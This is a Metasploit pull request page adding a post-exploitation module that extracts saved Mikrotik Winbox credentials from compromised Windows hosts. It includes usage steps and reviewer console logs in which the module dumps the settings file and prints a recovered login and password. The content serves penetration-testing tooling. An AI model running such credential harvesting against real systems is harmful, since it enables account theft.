Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add Post Windows Gather to perform Mikrotik Winbox "Keep Password" credentials extraction #18604

Merged
merged 7 commits into from Jan 9, 2024
Merged

Add Post Windows Gather to perform Mikrotik Winbox "Keep Password" credentials extraction #18604

merged 7 commits into from Jan 9, 2024

Conversation

siddolo
Copy link
Contributor

@siddolo siddolo commented Dec 7, 2023

This pull request introduces a new post module to extracts Mikrotik Winbox credentials saved in the "settings.cfg.viw" file when the "Keep Password" option is selected in Winbox.

Module Information

  • Name: post/windows/gather/credentials/winbox_settings
  • Targets: Mikrotik Winbox installation in Windows when the "Keep Password" option in selected
  • Tested Against: Mikrotik Winbox 3.40 (latest)

Verification

  • Get a meterpreter session on a Windows host.
  • Do: run post/windows/gather/credentials/winbox_settings
  • If any users in the system has a Keep Password enabled in Winbox, the credentials will be printed out.

Documentation Addition

I have included comprehensive documentation.

@bwatters-r7 bwatters-r7 self-assigned this Dec 7, 2023
@bwatters-r7 bwatters-r7 added docs rn-modules release notes for new or majorly enhanced modules labels Dec 7, 2023
@siddolo
Copy link
Contributor Author

siddolo commented Dec 30, 2023

Do you need something to merge this PR?

@bwatters-r7
Copy link
Contributor

Do you need something to merge this PR?

Hi there; sorry about how long this is taking. I grabbed this a while back because I saw that you're only supporting Meterpreter, and it should be quick to make sure it supports Meterpreter, shell, and powershell sessions. Unfortunately, I was working on some other stuff that took longer than expected, and then I was out on holiday.

TL;DR, I think the switch would be straight forward if you use the methods defined in https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/post/file.rb rather than calls to fs.file.

I'm catching up after being out for a bit, but I will take a deeper look into this in the next week. If you'd like to check to see if it is possible to support other session types, please have at it. Otherwise, I'll try and send some more specific guidance in the next couple of days.

@bwatters-r7
Copy link
Contributor

Using Meterpreter on Windows 10x64 22H2

msf6 post(windows/gather/credentials/winbox_settings) > 
[*] Sending stage (200774 bytes) to 10.5.132.118
[*] Meterpreter session 2 opened (10.5.135.201:4444 -> 10.5.132.118:52364) at 2024-01-05 15:56:38 -0600

msf6 post(windows/gather/credentials/winbox_settings) > set session 2
session => 2
msf6 post(windows/gather/credentials/winbox_settings) > run

[*] Checking Default Locations...
[+] Found File at C:\Users\msfconsole\AppData\Roaming\Mikrotik\Winbox\settings.cfg.viw
[*] 11 00 04 61 64 64 72 31 30 2e 35 2e 31 33 32 2e  ...addr10.5.132.
[*] 31 30 37 05 00 03 61 64 76 00 0b 00 09 61 75 74  107...adv....aut
[*] 6f 72 65 63 6f 6e 01 0a 00 08 61 75 74 6f 73 61  orecon....autosa
[*] 76 65 01 06 00 05 67 72 6f 75 70 07 00 02 69 64  ve....group...id
[*] 00 00 00 00 09 00 07 6b 65 65 70 70 77 64 01 05  .......keeppwd..
[*] 00 03 6c 65 67 00 0b 00 05 6c 6f 67 69 6e 61 64  ..leg....loginad
[*] 6d 69 6e 08 00 03 6d 61 6e 01 00 00 00 0b 00 06  min...man.......
[*] 6d 61 6e 61 6c 74 ff ff ff ff 0a 00 05 6e 65 69  manalt.......nei
[*] 67 68 02 00 00 00 05 00 04 6e 6f 74 65 0b 00 09  gh.......note...
[*] 6f 70 65 6e 69 6e 6e 65 77 00 0c 00 03 70 6f 73  openinnew....pos
[*] 69 00 70 02 12 03 a9 04 0f 00 03 70 77 64 76 33  i.p........pwdv3
[*] 4d 70 61 73 73 77 6f 72 64 0b 00 06 72 6e 65 69  Mpassword...rnei
[*] 67 68 03 00 00 00 06 00 05 72 6f 6d 6f 6e 08 00  gh.......romon..
[*] 06 73 65 63 75 72 65 01 0d 00 07 73 65 73 73 69  .secure....sessi
[*] 6f 6e 3c 6f 77 6e 3e 0b 00 03 74 61 62 4d 61 6e  on<own>...tabMan
[*] 61 67 65 64 34 00 07 77 69 6e 73 69 7a 65 2c 00  aged4..winsize,.
[*] 00 00 00 00 00 00 01 00 00 00 ff ff ff ff ff ff  ................
[*] ff ff ff ff ff ff ff ff ff ff 69 00 00 00 70 02  ..........i...p.
[*] 00 00 12 03 00 00 a9 04 00 00 09 00 04 7a 6f 6f  .............zoo
[*] 6d 00 00 00 00 00 00 17 00 04 63 6f 6c 73 dc 1d  m.........cols..
[*] e6 ff 00 00 15 ed e2 ff 00 00 a4 19 dc ff 00 00  ................
[*] 08 00 07 66 69 6c 74 65 72 73 07 00 02 69 64 01  ...filters...id.
[*] 00 00 00 09 00 04 6d 6f 64 65 04 00 00 00 06 00  ......mode......
[*] 05 6f 72 64 65 72 00 00 11 00 04 63 6f 6c 73 10  .order.....cols.
[*] fd e2 ff 00 00 a4 19 dc ff 00 00 08 00 07 66 69  ..............fi
[*] 6c 74 65 72 73 07 00 02 69 64 02 00 00 00 09 00  lters...id......
[*] 04 6d 6f 64 65 04 00 00 00 06 00 05 6f 72 64 65  .mode.......orde
[*] 72 00 00 11 00 04 63 6f 6c 73 11 18 e2 ff 00 00  r.....cols......
[*] a4 19 dc ff 00 00 08 00 07 66 69 6c 74 65 72 73  .........filters
[*] 07 00 02 69 64 03 00 00 00 09 00 04 6d 6f 64 65  ...id.......mode
[*] 00 00 00 00 06 00 05 6f 72 64 65 72 00 00        .......order..
[-] An error occurred: EOFError
[+] Login: admin
[+] Password: v3Mpassword
session<own>             rneighromosecure
[*] Post module execution completed

@bwatters-r7
Copy link
Contributor

I sent you a PR to this branch with shell sessions working; it should support powershell sessions, too, but I have not tested it.
siddolo#1

msf6 post(windows/gather/credentials/winbox_settings) > run

[*] Checking Default Locations...
[+] Found File at C:\Users\msfconsole\AppData\Roaming\Mikrotik\Winbox\settings.cfg.viw
[*] 11 00 04 61 64 64 72 31 30 2e 35 2e 31 33 32 2e  ...addr10.5.132.
[*] 31 30 37 05 00 03 61 64 76 00 0b 00 09 61 75 74  107...adv....aut
[*] 6f 72 65 63 6f 6e 01 0a 00 08 61 75 74 6f 73 61  orecon....autosa
[*] 76 65 01 06 00 05 67 72 6f 75 70 07 00 02 69 64  ve....group...id
[*] 00 00 00 00 09 00 07 6b 65 65 70 70 77 64 01 05  .......keeppwd..
[*] 00 03 6c 65 67 00 0b 00 05 6c 6f 67 69 6e 61 64  ..leg....loginad
[*] 6d 69 6e 08 00 03 6d 61 6e 01 00 00 00 0b 00 06  min...man.......
[*] 6d 61 6e 61 6c 74 ff ff ff ff 0a 00 05 6e 65 69  manalt.......nei
[*] 67 68 02 00 00 00 05 00 04 6e 6f 74 65 0b 00 09  gh.......note...
[*] 6f 70 65 6e 69 6e 6e 65 77 00 0c 00 03 70 6f 73  openinnew....pos
[*] 69 00 70 02 12 03 a9 04 0f 00 03 70 77 64 76 33  i.p........pwdv3
[*] 4d 70 61 73 73 77 6f 72 64 0b 00 06 72 6e 65 69  Mpassword...rnei
[*] 67 68 03 00 00 00 06 00 05 72 6f 6d 6f 6e 08 00  gh.......romon..
[*] 06 73 65 63 75 72 65 01 0d 00 07 73 65 73 73 69  .secure....sessi
[*] 6f 6e 3c 6f 77 6e 3e 0b 00 03 74 61 62 4d 61 6e  on<own>...tabMan
[*] 61 67 65 64 34 00 07 77 69 6e 73 69 7a 65 2c 00  aged4..winsize,.
[*] 00 00 00 00 00 00 01 00 00 00 ff ff ff ff ff ff  ................
[*] ff ff ff ff ff ff ff ff ff ff 69 00 00 00 70 02  ..........i...p.
[*] 00 00 12 03 00 00 a9 04 00 00 09 00 04 7a 6f 6f  .............zoo
[*] 6d 00 00 00 00 00 00 17 00 04 63 6f 6c 73 dc 1d  m.........cols..
[*] e6 ff 00 00 15 ed e2 ff 00 00 a4 19 dc ff 00 00  ................
[*] 08 00 07 66 69 6c 74 65 72 73 07 00 02 69 64 01  ...filters...id.
[*] 00 00 00 09 00 04 6d 6f 64 65 04 00 00 00 06 00  ......mode......
[*] 05 6f 72 64 65 72 00 00 11 00 04 63 6f 6c 73 10  .order.....cols.
[*] fd e2 ff 00 00 a4 19 dc ff 00 00 08 00 07 66 69  ..............fi
[*] 6c 74 65 72 73 07 00 02 69 64 02 00 00 00 09 00  lters...id......
[*] 04 6d 6f 64 65 04 00 00 00 06 00 05 6f 72 64 65  .mode.......orde
[*] 72 00 00 11 00 04 63 6f 6c 73 11 18 e2 ff 00 00  r.....cols......
[*] a4 19 dc ff 00 00 08 00 07 66 69 6c 74 65 72 73  .........filters
[*] 07 00 02 69 64 03 00 00 00 09 00 04 6d 6f 64 65  ...id.......mode
[*] 00 00 00 00 06 00 05 6f 72 64 65 72 00 00        .......order..
[+] Login: admin
[+] Password: v3Mpassword
session<own>             rneighromosecure
[*] Post module execution completed
msf6 post(windows/gather/credentials/winbox_settings) > sessions

Active sessions
===============

  Id  Name  Type                     Information                                     Connection
  --  ----  ----                     -----------                                     ----------
  2         meterpreter x64/windows  DESKTOP-V413087\msfconsole @ DESKTOP-V413087    10.5.135.201:4444 -> 10.5.132.118:52364 (10.5.
                                                                                     132.118)
  3         meterpreter x64/windows  DESKTOP-V413087\msfconsole @ DESKTOP-V413087    10.5.135.201:4444 -> 10.5.132.118:58952 (10.5.
                                                                                     132.118)
  4         shell x64/windows        Shell Banner: Microsoft Windows [Version 10.0.  10.5.135.201:4445 -> 10.5.132.118:52380 (10.5.
                                     19045.2006] -----                               132.118)

msf6 post(windows/gather/credentials/winbox_settings) > set session 4
session => 4
msf6 post(windows/gather/credentials/winbox_settings) > run

[*] Checking Default Locations...
[+] Found File at C:\Users\msfconsole\AppData\Roaming\Mikrotik\Winbox\settings.cfg.viw
[*] 11 00 04 61 64 64 72 31 30 2e 35 2e 31 33 32 2e  ...addr10.5.132.
[*] 31 30 37 05 00 03 61 64 76 00 0b 00 09 61 75 74  107...adv....aut
[*] 6f 72 65 63 6f 6e 01 0a 00 08 61 75 74 6f 73 61  orecon....autosa
[*] 76 65 01 06 00 05 67 72 6f 75 70 07 00 02 69 64  ve....group...id
[*] 00 00 00 00 09 00 07 6b 65 65 70 70 77 64 01 05  .......keeppwd..
[*] 00 03 6c 65 67 00 0b 00 05 6c 6f 67 69 6e 61 64  ..leg....loginad
[*] 6d 69 6e 08 00 03 6d 61 6e 01 00 00 00 0b 00 06  min...man.......
[*] 6d 61 6e 61 6c 74 ff ff ff ff 0a 00 05 6e 65 69  manalt.......nei
[*] 67 68 02 00 00 00 05 00 04 6e 6f 74 65 0b 00 09  gh.......note...
[*] 6f 70 65 6e 69 6e 6e 65 77 00 0c 00 03 70 6f 73  openinnew....pos
[*] 69 00 70 02 12 03 a9 04 0f 00 03 70 77 64 76 33  i.p........pwdv3
[*] 4d 70 61 73 73 77 6f 72 64 0b 00 06 72 6e 65 69  Mpassword...rnei
[*] 67 68 03 00 00 00 06 00 05 72 6f 6d 6f 6e 08 00  gh.......romon..
[*] 06 73 65 63 75 72 65 01 0d 00 07 73 65 73 73 69  .secure....sessi
[*] 6f 6e 3c 6f 77 6e 3e 0b 00 03 74 61 62 4d 61 6e  on<own>...tabMan
[*] 61 67 65 64 34 00 07 77 69 6e 73 69 7a 65 2c 00  aged4..winsize,.
[*] 00 00 00 00 00 00 01 00 00 00 ff ff ff ff ff ff  ................
[*] ff ff ff ff ff ff ff ff ff ff 69 00 00 00 70 02  ..........i...p.
[*] 00 00 12 03 00 00 a9 04 00 00 09 00 04 7a 6f 6f  .............zoo
[*] 6d 00 00 00 00 00 00 17 00 04 63 6f 6c 73 dc 1d  m.........cols..
[*] e6 ff 00 00 15 ed e2 ff 00 00 a4 19 dc ff 00 00  ................
[*] 08 00 07 66 69 6c 74 65 72 73 07 00 02 69 64 01  ...filters...id.
[*] 00 00 00 09 00 04 6d 6f 64 65 04 00 00 00 06 00  ......mode......
[*] 05 6f 72 64 65 72 00 00 11 00 04 63 6f 6c 73 10  .order.....cols.
[*] fd e2 ff 00 00 a4 19 dc ff 00 00 08 00 07 66 69  ..............fi
[*] 6c 74 65 72 73 07 00 02 69 64 02 00 00 00 09 00  lters...id......
[*] 04 6d 6f 64 65 04 00 00 00 06 00 05 6f 72 64 65  .mode.......orde
[*] 72 00 00 11 00 04 63 6f 6c 73 11 18 e2 ff 00 00  r.....cols......
[*] a4 19 dc ff 00 00 08 00 07 66 69 6c 74 65 72 73  .........filters
[*] 07 00 02 69 64 03 00 00 00 09 00 04 6d 6f 64 65  ...id.......mode
[*] 00 00 00 00 06 00 05 6f 72 64 65 72 00 00        .......order..
[+] Login: admin
[+] Password: v3Mpassword
session<own>             rneighromosecure
[*] Post module execution completed

@siddolo
Merge pull request #1 from bwatters-r7/update-18604
469a325 
Quick change to add support for more sessions and to only read the fi…
bwatters-r7
bwatters-r7 reviewed Jan 8, 2024
View reviewed changes
Copy link
Contributor

@bwatters-r7 bwatters-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more. 

msf6 post(windows/gather/credentials/winbox_settings) > sessions -i 1
[*] Starting interaction with 1...

PS C:\Users\msfconsole\Desktop> whoami
desktop-v413087\msfconsole
PS C:\Users\msfconsole\Desktop> ^Z
Background session 1? [y/N]  y
msf6 post(windows/gather/credentials/winbox_settings) > show options

Module options (post/windows/gather/credentials/winbox_settings):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on


View the full module info with the info, or info -d command.

msf6 post(windows/gather/credentials/winbox_settings) > run

[*] Checking Default Locations...
[+] Found File at C:\Users\msfconsole\AppData\Roaming\Mikrotik\Winbox\settings.cfg.viw
[*] 11 00 04 61 64 64 72 31 30 2e 35 2e 31 33 32 2e  ...addr10.5.132.
[*] 31 30 37 05 00 03 61 64 76 00 0b 00 09 61 75 74  107...adv....aut
[*] 6f 72 65 63 6f 6e 01 0a 00 08 61 75 74 6f 73 61  orecon....autosa
[*] 76 65 01 06 00 05 67 72 6f 75 70 07 00 02 69 64  ve....group...id
[*] 00 00 00 00 09 00 07 6b 65 65 70 70 77 64 01 05  .......keeppwd..
[*] 00 03 6c 65 67 00 0b 00 05 6c 6f 67 69 6e 61 64  ..leg....loginad
[*] 6d 69 6e 08 00 03 6d 61 6e 01 00 00 00 0b 00 06  min...man.......
[*] 6d 61 6e 61 6c 74 ff ff ff ff 0a 00 05 6e 65 69  manalt.......nei
[*] 67 68 02 00 00 00 05 00 04 6e 6f 74 65 0b 00 09  gh.......note...
[*] 6f 70 65 6e 69 6e 6e 65 77 00 0c 00 03 70 6f 73  openinnew....pos
[*] 69 00 70 02 12 03 a9 04 0f 00 03 70 77 64 76 33  i.p........pwdv3
[*] 4d 70 61 73 73 77 6f 72 64 0b 00 06 72 6e 65 69  Mpassword...rnei
[*] 67 68 03 00 00 00 06 00 05 72 6f 6d 6f 6e 08 00  gh.......romon..
[*] 06 73 65 63 75 72 65 01 0d 00 07 73 65 73 73 69  .secure....sessi
[*] 6f 6e 3c 6f 77 6e 3e 0b 00 03 74 61 62 4d 61 6e  on<own>...tabMan
[*] 61 67 65 64 34 00 07 77 69 6e 73 69 7a 65 2c 00  aged4..winsize,.
[*] 00 00 00 00 00 00 01 00 00 00 ff ff ff ff ff ff  ................
[*] ff ff ff ff ff ff ff ff ff ff 69 00 00 00 70 02  ..........i...p.
[*] 00 00 12 03 00 00 a9 04 00 00 09 00 04 7a 6f 6f  .............zoo
[*] 6d 00 00 00 00 00 00 17 00 04 63 6f 6c 73 dc 1d  m.........cols..
[*] e6 ff 00 00 15 ed e2 ff 00 00 a4 19 dc ff 00 00  ................
[*] 08 00 07 66 69 6c 74 65 72 73 07 00 02 69 64 01  ...filters...id.
[*] 00 00 00 09 00 04 6d 6f 64 65 04 00 00 00 06 00  ......mode......
[*] 05 6f 72 64 65 72 00 00 11 00 04 63 6f 6c 73 10  .order.....cols.
[*] fd e2 ff 00 00 a4 19 dc ff 00 00 08 00 07 66 69  ..............fi
[*] 6c 74 65 72 73 07 00 02 69 64 02 00 00 00 09 00  lters...id......
[*] 04 6d 6f 64 65 04 00 00 00 06 00 05 6f 72 64 65  .mode.......orde
[*] 72 00 00 11 00 04 63 6f 6c 73 11 18 e2 ff 00 00  r.....cols......
[*] a4 19 dc ff 00 00 08 00 07 66 69 6c 74 65 72 73  .........filters
[*] 07 00 02 69 64 03 00 00 00 09 00 04 6d 6f 64 65  ...id.......mode
[*] 00 00 00 00 06 00 05 6f 72 64 65 72 00 00        .......order..
[+] Login: admin
[+] Password: v3Mpassword
session<own>             rneighromosecure
[*] Post module execution completed

modules/post/windows/gather/credentials/winbox_settings.rb Outdated Show resolved Hide resolved
@siddolo @bwatters-r7
Update modules/post/windows/gather/credentials/winbox_settings.rb
dc6d84d 
Co-authored-by: Brendan <bwatters@rapid7.com>
@siddolo
Copy link
Contributor Author

siddolo commented Jan 8, 2024

done, thanks for your checks

@bwatters-r7 bwatters-r7 merged commit 57c882c into rapid7:master Jan 9, 2024
34 checks passed
@bwatters-r7
Copy link
Contributor

Release Notes

This pull request introduces a new post module to extracts Mikrotik Winbox credentials saved in the "settings.cfg.viw" file when the "Keep Password" option is selected in Winbox.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@bwatters-r7 bwatters-r7 bwatters-r7 left review comments

Assignees

@bwatters-r7 bwatters-r7

Labels
docs rn-modules release notes for new or majorly enhanced modules
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
2 participants
@siddolo @bwatters-r7